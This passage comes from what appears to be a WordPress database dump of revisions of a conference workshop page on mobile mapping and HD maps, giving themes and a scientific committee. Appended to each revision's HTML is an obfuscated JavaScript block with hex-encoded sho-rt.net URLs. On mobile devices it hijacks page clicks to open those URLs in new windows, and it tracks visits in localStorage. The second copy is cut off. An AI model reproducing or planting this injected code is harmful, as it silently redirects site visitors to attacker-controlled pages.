processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\r\n<ul>\r\n 	<li>\r\n<ul>\r\n 	<li>Kai-Wei Chiang, National Cheng Kung University, Taiwan</li>\r\n 	<li>Andrea Masiero, University of Florence, Italy</li>\r\n 	<li>Aboelmagd Noureldin, Queens University, Canada</li>\r\n 	<li>Cheng Wang, Xiamen University, China</li>\r\n 	<li>Antonio Vettore, University of Padova, Italy</li>\r\n 	<li>Ling Pei, Shanghai Jiao Tong University, China</li>\r\n 	<li>Allison Kealy, RMIT, Australia</li>\r\n 	<li>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</li>\r\n 	<li>Gunther Retscher, University of Vienna, Austria</li>\r\n 	<li>Jonathan Li, University of Waterloo, Canada</li>\r\n 	<li>Xiaoji Niu, Wuhan University, China</li>\r\n 	<li>Vassilis Gikas, NTUA, Greece</li>\r\n 	<li>Marco Piras, Polytechnic of Turin, Italy</li>\r\n 	<li>Paolo Dabove, Polytechnic of Turin, Italy</li>\r\n 	<li>You Li, Wuhan University, China</li>\r\n 	<li>Chenglu Wen, Xiamen University, China</li>\r\n 	<li>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</li>\r\n 	<li>Hsiu-Wen Chang Joly, PSL University, France</li>\r\n 	<li>Salil Goel, Uttar Pradesh, India</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:43:21','2022-10-07 19:43:21','',2095,'https://gsw2023.com/?p=2560',0,'revision','',0),
(2561,1,'2022-10-07 19:46:03','2022-10-07 19:46:03','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][/vc_column][vc_column][bsf-info-box icon_size=\"32\"]<u style=\"text-align: left; color: green;\">Scientific Committee:</u>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 